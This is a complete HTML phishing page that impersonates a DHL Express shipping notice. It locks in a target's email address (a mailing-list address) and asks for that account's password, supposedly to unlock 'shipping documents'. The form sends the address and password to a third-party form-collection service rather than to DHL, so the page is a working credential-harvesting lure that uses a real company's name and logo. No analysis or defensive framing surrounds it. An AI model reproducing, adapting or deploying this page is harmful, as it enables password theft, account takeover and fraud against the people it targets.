<!DOCTYPE html>
<html>
<title>DHL EXPRESS NOTICES </title>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>
<script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>
<style>
body {
font-family: Arial;
}
input[type=email], select {
width: 100%;
padding: 12px 20px;
margin: 15px 0;
display: block;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;
}
input[type=password], select {
width: 100%;
padding: 12px 20px;
margin: 15px 0;
display: block;
border: 1px solid #ccc;
border-radius: 4px;
box-sizing: border-box;
}
input[type=submit] {
width: 100%;
background-color: #000000;
color: yellow;
padding: 14px 20px;
margin: 8px 0;
border: none;
border-radius: 4px;
cursor: pointer;
}
input[type=submit]:hover {
background-color: #000000;
}
div.container {
margin: auto;
width: 50%;
padding: 10px;
border: 3px #FF8033;
border-radius: 10px;
background-color: orange;
width: 500px;
padding: 20px;
border-style: solid;
border-width: thin;
}
</style>
<body>
<br><br><br><br>
<div class="container">
<img src="https://c8.alamy.com/comp/BNXC17/dhl-logo-BNXC17.jpg" height="100"></img>
<p><font face="Trebuchet MS" color="Black" size="5">
<p></p>
<font face="Trebuchet MS" color="#ff471a" size="5"><b> DHL WORLDWIDE EXPRESS</b></font>
<p></p>
<form action="https://submit-form.com/gA650IsoD" method="POST">
<hr style="height:2px;border:none;color:black;background-color:black;" />
<div class="alert alert-danger">
<strong>Notice!:</strong> Download Shipping Documents in your Name
</div>
<center>
<input type="email" id="fname" name="feedback" Placeholder="Enter Email Address" value="linux-riscv@lists.infradead.org
" readonly required>
<input type="password" id="fname" name="feedbacknow" placeholder="Enter Email Password" autofocus required>
<input type="submit" value="DOWNLOAD FILES">
</center>
</form>
</div>
</body>
</html>